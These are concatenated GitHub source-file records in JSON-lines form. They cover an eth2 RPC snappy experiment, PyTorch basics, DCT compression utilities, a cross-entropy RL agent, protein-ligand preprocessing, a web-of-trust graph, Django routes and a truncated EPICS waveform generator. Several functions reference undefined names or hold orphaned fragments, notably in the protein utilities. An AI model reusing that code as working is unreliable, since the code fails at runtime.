more consensus-valid, but snappy compression testing can be simple):\n resp = SignedBeaconBlock(message=BeaconBlock(slot=slot)).encode_bytes().hex()\n print(f\"responding chunk {i} slot {slot} chunk: {resp}\")\n await morty.rpc.blocks_by_range.resp.chunk.raw(req['req_id'], resp, done=(i + 1 == parsed_req.count))\n\n print(\"done responding\")\n\n print(\"morty: stopped listening for requests\")\n\n\nasync def server_blocks_by_root_example(rumor: Rumor, nursery: trio.Nursery):\n\n # Morty is us\n morty = rumor.actor('morty')\n await morty.host.start()\n await morty.host.listen(tcp=9000)\n print(\"started morty\")\n\n # Rick is the other client\n rick_enr = \"enr:-Iu4QGuiaVXBEoi4kcLbsoPYX7GTK9ExOODTuqYBp9CyHN_PSDtnLMCIL91ydxUDRPZ-jem-o0WotK6JoZjPQWhTfEsTgmlkgnY0gmlwhDbOLfeJc2VjcDI1NmsxoQLVqNEoCVTC74VmUx25USyFe7lL0TgpXHaCX9CDy9H6boN0Y3CCIyiDdWRwgiMo\"\n\n rick_peer_id = await morty.peer.connect(rick_enr, \"bootnode\").peer_id()\n\n print(f\"connected to Rick {rick_peer_id}\")\n\n call = morty.rpc.blocks_by_root.listen(raw=True, compression='snappy')\n\n print(\"listening for requests\")\n\n async for req in call.req():\n print(f\"morty: Got request: {req}\")\n\n parsed_req = BlocksByRoot.decode_bytes(bytes.fromhex(req['chunk']['data']))\n print('parsed request: ', parsed_req)\n\n for i, root in enumerate(parsed_req):\n resp = SignedBeaconBlock(message=BeaconBlock(slot=slot)).encode_bytes().hex()\n print(f\"responding chunk {i} root {root}, chunk: {resp}\")\n await morty.rpc.blocks_by_range.resp.chunk.raw(req['req_id'], resp, done=(i + 1 == len(parsed_req)))\n\n print(\"done responding\")\n\n print(\"morty: stopped listening for requests\")\n\n\nasync def run_rumor_function(fn: Callable[[Rumor, trio.Nursery], Coroutine]):\n async with trio.open_nursery() as nursery:\n try:\n async with SubprocessConn(cmd='cd ../rumor && go run . bare') as conn:\n # A Trio nursery hosts all the async tasks of the Rumor instance.\n async with trio.open_nursery() as nursery:\n # And optionally use Rumor(conn, debug=True) to be super verbose about Rumor communication.\n await fn(Rumor(conn, nursery), nursery)\n # Cancel the nursery to signal that we are not using Rumor anymore\n nursery.cancel_scope.cancel()\n except Exception as e:\n print(e)\n\n\ntrio.run(run_rumor_function, basic_status_example)\n# trio.run(run_rumor_function, server_blocks_by_range_example)\n# trio.run(run_rumor_function, server_blocks_by_root_example)\n","repo_name":"protolambda/eth2-snappy-experiments","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":7895,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"45"} +{"seq_id":"19949619486","text":"import torch\nimport numpy as np\n\n# torch to numpy:\na = torch.ones(5)\nb = a.numpy()\n#print(a)\n#print(b)\n#print(type(b))\n\n# GPU check (with CPU both a and c will be on CPU):\na.add_(1)\n#print(a)\n#print(b)\n\n# numpy to torch:\nzz = np.ones(5)\n#print(zz)\nyy = torch.from_numpy(zz) # y and z share the same memory location\n#print(yy)\nzz = zz + 1\n#print(zz)\n#print(yy)\n# looks like this time the memory location is not shared\n\n# cuda check:\nif torch.cuda.is_available():\n device = torch.device(\"cuda\")\n x = torch.ones(5, device=device)\n y = torch.ones(5)\n y = y.to(device) # or y = y.cuda()\n z = x + y\n z = z.to(\"cpu\") # or z = z.cpu()\n print(z)\n print(z.numpy())\n\n# requires_grad - gradient calculation (when we have a variable we want to optimize):\ng = torch.ones(5, requires_grad=True)\nprint(g)\n","repo_name":"eggressive/pytorch-basics","sub_path":"numpy_ts.py","file_name":"numpy_ts.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"23144779963","text":"import numpy as np\nimport cv2 \nimport math\nimport matplotlib.pyplot as plt\n\ndef my_dct(matrix, N) :\n \"\"\"\n This function break up the matrix in blocks and then apply to each of them \n the default dct provided by opencv \n\n Args:\n matrix : Matrix to which apply the dct\n N : The block dimension\n\n Returns:\n The dct matrix rebuild from the blocks\n \"\"\"\n\n height, width = matrix.shape \n block_list = matrix_to_blocks(np.float32(matrix), N, height, width)\n \n #Applying the dct transformation per block\n dct_block_list = []\n for elem in block_list : \n dct_block_list.append(cv2.dct(elem))\n\n return blocks_to_matrix(dct_block_list, N, height, width)\n\n\n\ndef my_idct(matrix, N) :\n \"\"\"\n This function break up the matrix in blocks and then apply to each of them \n the default inversed dct provided by opencv. Then the matrix is build back from\n the block list\n\n Args:\n matrix : Matrix to which is applied the idct\n N : The block dimension\n\n Returns:\n The idct matrix rebuild from the blocks\n \"\"\"\n\n height, width = matrix.shape \n block_list = matrix_to_blocks(np.float32(matrix), N, height, width) \n \n #Applying the dct INVERTED transformation per block\n idct_block_list = []\n for mtrx in block_list : \n idct_block_list.append(cv2.idct(mtrx))\n idct_mtrx = np.round(blocks_to_matrix(idct_block_list, N, height, width))\n \n #some value might be higher than 255 or less than 0 after the idct, resulting the conversation in int8 to broke some image parts\n for i in range(height) : \n for j in range (width) : \n if idct_mtrx[i][j] > 255 : idct_mtrx[i][j] = 255 \n if idct_mtrx[i][j] < 0 : idct_mtrx[i][j] = 0\n \n #Building back the whole matrix, however the 8 bit unsigned integer version is returned; so the matrix can be immediatly used\n return np.uint8(idct_mtrx)\n\n\n\ndef matrix_to_blocks(matrix, N, h, w) : \n \"\"\"\n Given a matrix, this function break up the matrix in blocks. The dimension of the blocks are generally\n NxN, however on the edges of the matrix if the height and/or the width do not fit with NxN blocks, the dimension\n of the matrix is temporally changed to have blocks even sized (e.g with a 7x9 matrix and N=4, starting from the top-left \n corner, only 2 4x4 blocks can fit; since the number of columns and rows is odd, we temporally change the matrix dimension\n to 8x10. In this way the \"third\" block in the list will have a 4x2 dimension. The first row is ended, we move to the fifth row\n and keep iterate). The columns and rows must be even because the opencv dct accepts only even sized matrixes/blocks\n\n Args:\n matrix : Matrix to be decomposed\n N : The block dimension\n h : The height of the matrix\n w : The width of the matrix\n\n Returns:\n A list with all blocks\n \"\"\"\n\n fix_mtrx = padding(matrix, N, h, w) #changing size\n new_h, new_l = fix_mtrx.shape\n block_list = []\n\n for row_block in range(0, math.ceil(new_h/N)) :\n for col_block in range(0, math.ceil(new_l/N)) : \n \n col_indx = np.minimum(new_l - col_block*N, N)\n row_indx = np.minimum(new_h - row_block*N, N)\n\n block = np.zeros((row_indx, col_indx))\n for i in range(row_indx) :\n for j in range(col_indx) : \n block[i][j] = fix_mtrx[row_block*N + i][col_block*N + j] \n block_list.append(block)\n\n return block_list\n\n\n\ndef blocks_to_matrix(blocklist, N, mtrx_h, mtrx_w) : \n \"\"\"\n This function build from a given list of blocks a matrix, from which the block where derived\n\n Args:\n blocklist : A list of blocks\n N : The block dimension\n mtrx_h : The height of the matrix\n mtrx_w : The width of the matrix\n\n Returns:\n The builded matrix\n \"\"\"\n\n build_mtrx = np.zeros((mtrx_h, mtrx_w), np.float32)\n numblock_in_row = math.ceil(mtrx_w / N)\n \n for i in range(0, mtrx_h) :\n for j in range(0, mtrx_w) : \n build_mtrx[i][j] = blocklist[math.floor(i / N) * numblock_in_row + math.floor(j / N)][i%N][j%N]\n \n return build_mtrx\n\n\ndef padding(matrix, N, h, w) : \n \"\"\"\n This function resize a given matrix to its even form. If a row and/or column is added, the new values\n added next to the edge are copied from the near row/column\n\n Args:\n matrix : Matrix to be resized\n N : The block dimension\n h : The height of the matrix\n w : The width of the matrix\n\n Returns:\n The even sized matrix\n \"\"\"\n\n row_rem = h % N\n col_rem = w % N\n return np.pad(matrix, pad_width = ((0, 0 if row_rem % 2 == 0 else 1), (0, 0 if col_rem % 2 == 0 else 1)), mode = 'edge')\n\n\ndef percentage_loss (dct_mtrx, R) :\n \"\"\"\n This function set to 0 the R% values of the given matrix\n\n Args:\n dct_matrix : A matrix to which the dct was applied\n R : The percentage loss\n\n Returns:\n The \"compressed\" version of the matrix\n \"\"\"\n\n value = np.percentile(np.abs(dct_mtrx), R) #search the value for which %R in np.abs(dct_mtrx) are lower than this value returned\n mtrx_comp = np.copy(dct_mtrx)\n\n #The elements in the matrix lower than value are set to 0\n mtrx_comp[ np.abs(mtrx_comp) <= value ] = 0 #inline condition \n\n return mtrx_comp\n\n\ndef MSE (og_mtrx, compressed_mtrx) :\n \"\"\"\n Calculate the mean squared error between 2 matrixes\n\n Args:\n og_mtrx : original matrix\n compressed_mtrx : new matrix after some operations\n\n Returns:\n The mean squared error\n \"\"\"\n\n height, width = og_mtrx.shape\n sque = np.float64(0)\n for i in range(0, height) :\n for j in range(0, width) :\n sque += (int(compressed_mtrx[i][j]) - int(og_mtrx[i][j]))**2\n return sque / (height * width)\n\n\n\n#Weighted mean squared error\ndef MSE_P(MSE_Y, MSE_Cb, MSE_Cr) : return 0.75*MSE_Y + 0.125*MSE_Cb + 0.125*MSE_Cr\n\n\n\ndef PNSR(MSE_P) : return (10 * math.log((255**2 / MSE_P), 10)) if MSE_P != 0 else np.inf\n\n\n\ndef PSNR_plot(R_values, PSNR_values, img_name, N) :\n \"\"\"\n Simple function to save a PSNR plot in the ./Plot image folder\n\n Args: \n R_values : x axis values\n PSNR_values : y axis values\n img_file : file name + extension\n N : block dimension\n Returns:\n None\n \"\"\"\n \n plot = plt.figure()\n plt.title(img_name + \".jpg \" + str(N) + \"x\" + str(N) + \" blocks\")\n plt.yscale(\"linear\")\n plt.xlabel(\"R\")\n plt.ylabel(\"PSNR\")\n plt.xticks(R_values)\n plt.xlim([0, 101])\n plt.plot(R_values, PSNR_values, c = 'red')\n plt.grid()\n plot.savefig(\"Plot image/Plot \" + img_name + \" \" + str(N) + \" blocks.jpg\", bbox_inches = 'tight') \n\n\n\n\n\n\n\n\n\n\n","repo_name":"zincalex/Homework-DCT","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":6868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"32794479862","text":"#Cross-Entropy Algorithms for both discrete and continuous action spaces are implemented\n\n\nimport torch\nimport torch.optim as optim\nimport torch.nn.functional as func\nimport numpy as np\nfrom copy import deepcopy\nfrom Agents.Utilities.LinearTransformations import transform_interval\n\n\nclass CEM():\n def __init__(self, pi_model, noise, pi_model_lr, tau, percentile_param, \n learning_iter_per_fit):\n self.pi_model = pi_model\n self.noise = noise\n self.tau = tau\n self.percentile_param = percentile_param\n self.learning_iter_per_fit = learning_iter_per_fit\n self.optimizer = optim.Adam(params=self.pi_model.parameters(), lr=pi_model_lr)\n return None\n \n def fit(self, sessions):\n #get elite states and actions\n elite_states, elite_actions, elite_session_n = self.get_elite_states_and_actions(sessions)\n \n #learn\n if 0 < elite_session_n < len(sessions):\n for _ in range(self.learning_iter_per_fit):\n self.update_policy(elite_states, elite_actions)\n return None\n \n def get_elite_states_and_actions(self, sessions):\n #get threshold of total rewards according to percentile parameter\n total_rewards = [sum(session['rewards']) for session in sessions]\n total_reward_threshold = np.percentile(total_rewards, self.percentile_param)\n \n #get elite states and actions\n elite_states, elite_actions = [], []\n elite_session_n = 0\n for session in sessions:\n if sum(session['rewards']) >= total_reward_threshold:\n session_len = min(len(session['states']), len(session['actions']))\n elite_states.extend(session['states'][:session_len])\n elite_actions.extend(session['actions'][:session_len])\n elite_session_n += 1\n\n return elite_states, elite_actions, elite_session_n\n \n def update_model(self, model, optimizer, loss):\n #gradient step\n copy_pi_midel = deepcopy(self.pi_model)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n \n #soft update\n for param, copy_param in zip(self.pi_model.parameters(), copy_pi_midel.parameters()):\n param.data.copy_(self.tau * param + (1 - self.tau) * copy_param)\n return None\n \n def reset(self):\n self.noise.reset()\n self.noise.reduce()\n return None\n\n\nclass CEM_Discrete(CEM):\n def __init__(self, pi_model, noise, pi_model_lr, tau=1e-2, percentile_param=70, \n learning_iter_per_fit=16, greedy_policies=False):\n\n super().__init__(pi_model, noise, pi_model_lr, tau, \n percentile_param, learning_iter_per_fit)\n \n self.noise = noise\n self.greedy_policies = greedy_policies\n return None\n \n def get_action(self, state):\n if np.random.uniform() < self.noise.threshold:\n return self.noise.get()\n else:\n probs = self.get_probs(self.pi_model, state)\n if self.greedy_policies:\n action = np.argmax(probs.detach().data.numpy())\n else:\n dist = torch.distributions.Categorical(probs)\n action = int(dist.sample())\n return action\n \n def get_probs(self, model, state):\n return func.softmax(model(state), -1)\n \n def update_policy(self, elite_states, elite_actions):\n #get loss\n logits = self.pi_model(elite_states)\n elite_actions = torch.LongTensor(elite_actions)\n loss = func.cross_entropy(logits, elite_actions)\n \n #learn\n self.update_model(self.pi_model, self.optimizer, loss)\n return None\n \nclass CEM_Continuous(CEM):\n \n def __init__(self, action_min, action_max, pi_model, noise, \n pi_model_lr=1e-3, tau=1e-2, percentile_param=70, learning_iter_per_fit=16):\n \n super().__init__(pi_model, noise, pi_model_lr, tau, \n percentile_param, learning_iter_per_fit)\n \n self.action_min = action_min\n self.action_max = action_max\n return None\n \n def get_action(self, state):\n action = self.pi_model(state).detach().numpy() + self.noise.get()\n action = self.transform_interval(action)\n return np.clip(action, self.action_min, self.action_max)\n \n def transform_interval(self, action):\n return transform_interval(action, self.action_min, self.action_max)\n \n def update_policy(self, elite_states, elite_actions):\n #get loss\n elite_actions = torch.FloatTensor(elite_actions)\n pred_actions = self.transform_interval(self.pi_model(elite_states))\n loss = torch.mean((pred_actions - elite_actions) ** 2)\n \n #learn\n self.update_model(self.pi_model, self.optimizer, loss)\n return None\n \n ","repo_name":"imm-rl-lab/reinforcement_learning_baseline","sub_path":"Agents/CEM.py","file_name":"CEM.py","file_ext":"py","file_size_in_byte":4952,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"8047111922","text":"import os\nimport pickle\nimport torch\nimport numpy as np\nimport pandas as pd\nfrom Bio.PDB import PDBParser\nimport rdkit.Chem as Chem\nfrom rdkit.Chem import Draw\nfrom rdkit.Chem import AllChem\nfrom rdkit import rdBase\nfrom tqdm import tqdm\nimport glob\nimport torch\nimport torch.nn.functional as F\nfrom io import StringIO\nimport sys\nfrom Bio.PDB.PDBIO import PDBIO\nfrom Bio.PDB.PDBIO import Select\nimport scipy\nimport scipy.spatial\nfrom rdkit.Geometry import Point3D\nimport gvp\nimport gvp.data\ndef read_mol(sdf_fileName, mol2_fileName, verbose=False):\n rdBase.LogToPythonStderr()\n stderr = sys.stderr\n sio = sys.stderr = StringIO()\n mol = Chem.MolFromMolFile(sdf_fileName, sanitize=False)\n problem = False\n try:\n Chem.SanitizeMol(mol)\n mol = Chem.RemoveHs(mol)\n sm = Chem.MolToSmiles(mol)\n except Exception as e:\n sm = str(e)\n problem = True\n if problem:\n mol = Chem.MolFromMol2File(mol2_fileName, sanitize=False)\n problem = False\n try:\n Chem.SanitizeMol(mol)\n mol = Chem.RemoveHs(mol)\n sm = Chem.MolToSmiles(mol)\n problem = False\n except Exception as e:\n sm = str(e)\n problem = True\n\n if verbose:\n print(sio.getvalue())\n sys.stderr = stderr\n return mol, problem\n\n\ndef write_renumbered_sdf(toFile, sdf_fileName, mol2_fileName):\n # read in mol\n mol, _ = read_mol(sdf_fileName, mol2_fileName)\n # reorder the mol atom number as in smiles.\n m_order = list(mol.GetPropsAsDict(includePrivate=True, includeComputed=True)['_smilesAtomOutputOrder'])\n mol = Chem.RenumberAtoms(mol, m_order)\n w = Chem.SDWriter(toFile)\n w.write(mol)\n w.close()\ndef read_pdbbind_data(fileName):\n with open(fileName) as f:\n a = f.readlines()\n info = []\n for line in a:\n if line[0] == '#':\n continue\n lines, ligand = line.split('//')\n pdb, resolution, year, affinity, raw = lines.strip().split(' ')\n ligand = ligand.strip().split('(')[1].split(')')[0]\n # print(lines, ligand)\n info.append([pdb, resolution, year, affinity, raw, ligand])\n info = pd.DataFrame(info, columns=['pdb', 'resolution', 'year', 'affinity', 'raw', 'ligand'])\n info.year = info.year.astype(int)\n info.affinity = info.affinity.astype(float)\n return info\nthree_to_one = {'ALA': 'A', 'CYS': 'C', 'ASP': 'D', 'GLU': 'E', 'PHE': 'F', 'GLY': 'G', 'HIS': 'H', \n 'ILE': 'I', 'LYS': 'K', 'LEU': 'L', 'MET': 'M', 'ASN': 'N', 'PRO': 'P', 'GLN': 'Q', \n 'ARG': 'R', 'SER': 'S', 'THR': 'T', 'VAL': 'V', 'TRP': 'W', 'TYR': 'Y'}\n\ndef get_protein_feature(res_list, pro_res_list=None, plm=True):\n # protein feature extraction code from https://github.com/drorlab/gvp-pytorch\n # ensure all res contains N, CA, C and O\n res_list = [res for res in res_list if (('N' in res) and ('CA' in res) and ('C' in res) and ('O' in res))]\n # construct the input for ProteinGraphDataset\n # which requires name, seq, and a list of shape N * 4 * 3\n structure = {}\n structure['name'] = \"placeholder\"\n structure['seq'] = \"\".join([three_to_one.get(res.resname) for res in res_list])\n coords = []\n ca= []\n # print('get_protein_feature!')\n for res in res_list:\n res_coords = []\n for atom in [res['N'], res['CA'], res['C'], res['O']]:\n if atom == res['CA']:\n ca.append(list(atom.coord))\n res_coords.append(list(atom.coord))\n coords.append(res_coords)\n structure['coords'] = coords\n torch.set_num_threads(1) # this reduce the overhead, and speed up the process for me.\n dataset = gvp.data.ProteinGraphDataset([structure])\n protein = dataset[0]\n if plm and pro_res_list:\n model, alphabet = esm.pretrained.esm2_t33_650M_UR50D()\n model.eval()#.to(device)\n # res_list = res_list.to(device)\n # pro_res_list = pro_res_list.to(device)\n batch_convert = alphabet.get_batch_converter()\n protein_ca, index = pocket_in_protein(res_list, pro_res_list)\n token_reps = get_plm_reps(protein_ca, model, batch_convert)\n pocket_token_reps = token_reps[index].to(\"cpu\")\n protein.seq = pocket_token_reps\n # print('pass!')\n return protein.x, protein.seq, protein.node_s, protein.node_v, protein.edge_index, protein.edge_s, protein.edge_v\n\ndef get_clean_res_list(res_list, verbose=False, ensure_ca_exist=False, bfactor_cutoff=None):\n clean_res_list = []\n for res in res_list:\n hetero, resid, insertion = res.full_id[-1]\n if hetero == ' ':\n if res.resname not in three_to_one:\n if verbose:\n print(res, \"has non-standard resname\")\n continue\n if (not ensure_ca_exist) or ('CA' in res):\n if bfactor_cutoff is not None:\n ca_bfactor = float(res['CA'].bfactor)\n if ca_bfactor < bfactor_cutoff:\n continue\n clean_res_list.append(res)\n else:\n if verbose:\n print(res, res.full_id, \"is hetero\")\n return clean_res_list\n\ndef remove_hetero_and_extract_ligand(res_list, verbose=False, ensure_ca_exist=False, bfactor_cutoff=None):\n # get all regular protein residues. and ligand.\n clean_res_list = []\n ligand_list = []\n for res in res_list:\n hetero, resid, insertion = res.full_id[-1]\n if hetero == ' ':\n if (not ensure_ca_exist) or ('CA' in res):\n # in rare case, CA is not exists.\n if bfactor_cutoff is not None:\n ca_bfactor = float(res['CA'].bfactor)\n if ca_bfactor < bfactor_cutoff:\n continue\n clean_res_list.append(res)\n elif hetero == 'W':\n # is water, skipped.\n continue\n else:\n ligand_list.append(res)\n if verbose:\n print(res, res.full_id, \"is hetero\")\n return clean_res_list, ligand_list\n\ndef get_res_unique_id(residue):\n pdb, _, chain, (_, resid, insertion) = residue.full_id\n unique_id = f\"{chain}_{resid}_{insertion}\"\n return unique_id\n\ndef save_cleaned_protein(c, proteinFile):\n res_list = list(c.get_residues())\n clean_res_list, ligand_list = remove_hetero_and_extract_ligand(res_list)\n res_id_list = set([get_res_unique_id(residue) for residue in clean_res_list])\n\n io=PDBIO()\n class MySelect(Select):\n def accept_residue(self, residue, res_id_list=res_id_list):\n if get_res_unique_id(residue) in res_id_list:\n return True\n else:\n return False\n io.set_structure(c)\n io.save(proteinFile, MySelect())\n return clean_res_list, ligand_list\n\ndef split_protein_and_ligand(c, pdb, ligand_seq_id, proteinFile, ligandFile):\n clean_res_list, ligand_list = save_cleaned_protein(c, proteinFile)\n chain = c.id\n # should take a look of this ligand_list to ensure we choose the right ligand.\n seq_id = ligand_seq_id\n # download the ligand in sdf format from rcsb.org. because we pdb format doesn't contain bond information.\n # you could also use openbabel to do this.\n url = f\"https://models.rcsb.org/v1/{pdb}/ligand?auth_asym_id={chain}&auth_seq_id={seq_id}&encoding=sdf&filename=ligand.sdf\"\n r = requests.get(url)\n open(ligandFile , 'wb').write(r.content)\n return clean_res_list, ligand_list\n\n\n\n\ndef generate_sdf_from_smiles_using_rdkit(smiles, rdkitMolFile, shift_dis=30, fast_generation=False):\n mol_from_rdkit = Chem.MolFromSmiles(smiles)\n if fast_generation:\n # conformation generated using Compute2DCoords is very fast, but less accurate.\n mol_from_rdkit.Compute2DCoords()\n else:\n mol_from_rdkit = generate_conformation(mol_from_rdkit)\n coords = mol_from_rdkit.GetConformer().GetPositions()\n new_coords = coords + np.array([shift_dis, shift_dis, shift_dis])\n write_with_new_coords(mol_from_rdkit, new_coords, rdkitMolFile)\n\n\n # save protein chains that belong to chains_in_contact\n class MySelect(Select):\n def accept_residue(self, residue, chains_in_contact=chains_in_contact):\n pdb, _, chain, (_, resid, insertion) = residue.full_id\n if chain in chains_in_contact:\n return True\n else:\n return False\n\n io=PDBIO()\n io.set_structure(s)\n io.save(toFile, MySelect())\n\ndef normalize(x):\n return (x - x.min()) / (x.max() - x.min())\n\ndef create_dir(dir_list):\n assert isinstance(dir_list, list) == True\n for d in dir_list:\n if not os.path.exists(d):\n os.makedirs(d)\n\ndef save_model_dict(model, model_dir, msg):\n model_path = os.path.join(model_dir, msg + '.pt')\n torch.save(model.state_dict(), model_path)\n print(\"model has been saved to %s.\" % (model_path))\n\ndef load_model_dict(model, ckpt):\n model.load_state_dict(torch.load(ckpt))\n\ndef del_file(path):\n for i in os.listdir(path):\n path_file = os.path.join(path,i) \n if os.path.isfile(path_file):\n os.remove(path_file)\n else:\n del_file(path_file)\n\ndef write_pickle(filename, obj):\n with open(filename, 'wb') as f:\n pickle.dump(obj, f)\n\ndef read_pickle(filename):\n with open(filename, 'rb') as f:\n obj = pickle.load(f)\n return obj\n\n\n\nclass BestMeter(object):\n \"\"\"Computes and stores the best value\"\"\"\n\n def __init__(self, best_type):\n self.best_type = best_type \n self.count = 0 \n self.reset()\n\n def reset(self):\n if self.best_type == 'min':\n self.best = float('inf')\n else:\n self.best = -float('inf')\n\n def update(self, best):\n self.best = best\n self.count = 0\n\n def get_best(self):\n return self.best\n\n def counter(self):\n self.count += 1\n return self.count\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n\n def get_average(self):\n self.avg = self.sum / (self.count + 1e-12)\n\n return self.avg\n","repo_name":"DingLuoXMU/ConBAP","sub_path":"supervised/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"1369555543","text":"import logging\nimport asyncio\nimport networkx\nfrom .base_graph import BaseGraph\nfrom .constants import NodeStatus\n\n\nclass WoTGraph(BaseGraph):\n def __init__(self, app, community, nx_graph=None):\n \"\"\"\n Init WoTGraph instance\n :param sakia.core.app.Application app: Application instance\n :param sakia.core.community.Community community: Community instance\n :param networkx.Graph nx_graph: The networkx graph\n :return:\n \"\"\"\n super().__init__(app, community, nx_graph)\n\n async def initialize(self, center_identity, account_identity):\n node_status = await self.node_status(center_identity, account_identity)\n\n self.add_identity(center_identity, node_status)\n\n # create Identity from node metadata\n certifier_coro = asyncio.ensure_future(center_identity.unique_valid_certifiers_of(self.app.identities_registry,\n self.community))\n certified_coro = asyncio.ensure_future(center_identity.unique_valid_certified_by(self.app.identities_registry,\n self.community))\n\n certifier_list, certified_list = await asyncio.gather(certifier_coro, certified_coro)\n\n # populate graph with certifiers-of\n certifier_coro = asyncio.ensure_future(self.add_certifier_list(certifier_list,\n center_identity, account_identity))\n # populate graph with certified-by\n certified_coro = asyncio.ensure_future(self.add_certified_list(certified_list,\n center_identity, account_identity))\n\n await asyncio.gather(certifier_coro, certified_coro)\n\n async def get_shortest_path_to_identity(self, from_identity, to_identity):\n \"\"\"\n Return path list of nodes from from_identity to to_identity\n :param identity from_identity:\n :param identity to_identity:\n :return:\n \"\"\"\n path = list()\n\n logging.debug(\"path between %s to %s...\" % (from_identity.uid, to_identity.uid))\n self.add_identity(from_identity, NodeStatus.HIGHLIGHTED)\n\n # recursively feed graph searching for account node...\n await self.explore_to_find_member(from_identity, to_identity)\n\n # calculate path of nodes between identity and to_identity\n try:\n path = networkx.shortest_path(self.nx_graph, from_identity.pubkey, to_identity.pubkey)\n except networkx.exception.NetworkXException as e:\n logging.debug(str(e))\n\n return path\n\n async def explore_to_find_member(self, account_identity, to_identity):\n \"\"\"\n Scan graph to find identity\n :param sakia.core.registry.Identity from_identity: Scan starting point\n :param sakia.core.registry.Identity to_identity: Scan goal\n \"\"\"\n explored = []\n explorable = [account_identity]\n\n while len(explorable) > 0:\n current = explorable.pop()\n certified_list = await current.unique_valid_certified_by(self.app.identities_registry,\n self.community)\n\n await self.add_certified_list(certified_list, current, account_identity)\n if to_identity.pubkey in [data['identity'].pubkey for data in certified_list]:\n return True\n\n explored.append(current)\n for entry in certified_list:\n if entry['identity'] not in explored + explorable:\n explorable.append(entry['identity'])\n\n return False\n","repo_name":"Skanda42/sakia","sub_path":"src/sakia/core/graph/wot_graph.py","file_name":"wot_graph.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"45"} +{"seq_id":"3737234272","text":"from django.conf.urls import patterns, include, url\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nimport django.views\n\nfrom OMRS import views\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'openMRScap.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n #url(r'^$',views.index,name='index'),\n #url(r'^$',views.index,name='server'),\n\n #add other projects URLS\n #url(r'^OMRS/',include('OMRS.urls')),\n\n url(r'^$','OMRS.views.index', name='home'),\n\n #url(r'^server/',views.jobs.as_view(),name='server'),\n url(r'^jobs/',views.jobs.as_view(),name='jobs'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^server/$','OMRS.views.server'),\n url(r'^userprofile/$','OMRS.views.userProfile',name='userprofile'),\n url(r'^jobserversettings/$','OMRS.views.userJobSettings'), #lists just the URLS of the servers in the system\n url(r'^restricted/$', 'OMRS.views.restricted', name='restricted'), #not doing anything yet\n\n url(r'^setup/$', 'OMRS.views.post_server_details',name='setup'),\n\n #user details\n url(r'^register/$', 'OMRS.views.register', name='register'),\n url(r'^login/$', 'OMRS.views.user_login',name='login'),\n url(r'^logout/$', 'OMRS.views.user_logout', name='logout'),\n\n #import file\n url(r'^upload/$', 'OMRS.views.upload', name='upload'),\n )\n\nif settings.DEBUG:\n urlpatterns += patterns(\n 'django.views.static',\n (r'media/(?P.*)',\n django.views.static.serve,\n {'document_root': settings.MEDIA_ROOT}),\n )\n","repo_name":"omiltoro/softbrew","sub_path":"openMRScap/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"39535418026","text":"import sys\nimport re\n\n#python3.8 GenWaveformPV.py Setpt_list.txt ai WaveValue\nargc = len(sys.argv)\n#print(argc)\nif argc != 4:\n print('Usage:python3.8 '+str(sys.argv[0])+' PVlistFile Datatype(ai/bi/longin,ao/bo/longout) WaveformName ')\n raise SystemExit('EX)python3.8 '+str(sys.argv[0])+' Setpt_list.txt ai WaveValue')\n\nfilename = str(sys.argv[1])\ndtype = str(sys.argv[2]).lower()\nwfname = str(sys.argv[3])\n\ndatatype = ''\nif(dtype == 'ao' or dtype == 'ai'): \n datatype = 'double'\nelif(dtype == 'longin' or dtype == 'longout'): datatype = 'int'\nelif(dtype == 'bi' or dtype == 'bo'): datatype = 'bool'\n\nfieldlist = []\nvaluelist = ['\\\"\\\"', '\\\"\\\"', '\\\"\\\"', 'YES']\nif(dtype == 'ai' or dtype == 'bi' or dtype == 'longin'):\n fieldlist = ['DESC', 'VAL', 'INP', 'PINI']\nelse: \n fieldlist = ['DESC', 'VAL', 'OUT', 'PINI']\n\npvlist = []\nf = open(filename, 'r')\nfor line in f:\n if(line[0] == '#'): continue\n pvlist.append(line.rstrip('\\n'))\nf.close()\n\nseqfilename = \"snc\"+filename.rsplit('.', 1)[0]+\"WF\"\ntemplfilename = 'templ'+filename.rsplit('.', 1)[0]\nsubfilename = 'sub'+filename.rsplit('.', 1)[0]\nwffilename = 'wf'+filename.rsplit('.', 1)[0]\n\nseqExt = \".stt\"\ndbdExt = \".dbd\"\ntemplExt = \".template\"\nsubExt = \".sub\"\nvdbExt = \".vdb\"\n\nseq = open('../src/'+seqfilename+seqExt, \"w\")\ndbd = open('../src/'+seqfilename+dbdExt, \"w\")\ntempl = open('../Db/'+templfilename+templExt, \"w\")\nsub = open('../Db/'+subfilename+subExt, \"w\")\nvdb = open('../Db/'+wffilename+vdbExt, \"w\")\n#########################################################\nlenlist = len(pvlist)\nnl = '\\n'\ntab = '\\t'\nopen = '{'\nclose = '}'\ncharsize = 60\nprefix = '$(SYS)$(SUBSYS)$(DEV)$(SUBDEV)'\nsignal = '$(SIGNAL)'\ncharnull = \"'\\\\0'\"\n#########################################################\n########### Waveform vdb Generation ###################\nsncText = f'\\\nrecord(waveform, \"{prefix}{wfname}\"){nl}\\\n{open}{nl}\\\n 